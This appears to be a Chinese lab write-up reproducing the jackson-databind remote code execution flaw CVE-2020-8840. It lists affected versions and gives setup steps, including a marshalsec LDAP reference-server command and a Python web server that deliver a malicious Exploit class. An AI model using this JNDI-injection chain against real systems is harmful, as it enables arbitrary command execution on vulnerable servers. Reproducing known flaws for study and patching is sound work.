FasterXML/jackson-databind 远程代码执行漏洞复现（CVE-2020-8840）

简介

FasterXMLjackson-databind是一个简单基于Java应用库，Jackson可以轻松的将Java对象转换成json对象和xml文档，同样也可以将json、xml转换成Java对象。

影响范围

产品

FastXML

版本

FasterXMLjackson-databind<2.9.9.2

FasterXMLjackson-databind<2.10.0

FasterXMLjackson-databind<2.7.9.6

FasterXMLjackson-databind<2.8.11.4

组件

FasterXMLjackson-databind

FasterXMLback-ported

复现

环境搭建

https://github.com/fairyming/CVE-2020-8840

项目下下来，所需的环境和POC都在里面。

在IDEA里创建项目

接下来还需要一个东西是marshalsec，这个在GITHUB上可以找到

将这三个文件放在同一个文件夹里

在Exploit.java里修改所需要执行的命令

接下来使用marshalsec来创建LDAP

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:80/#Exploit

然后使用Python创建Web服务

python2 -m SimpleHTTPServer 80

环境基本就配置好了

最后在IDEA里运行，Poc.java文件完成复现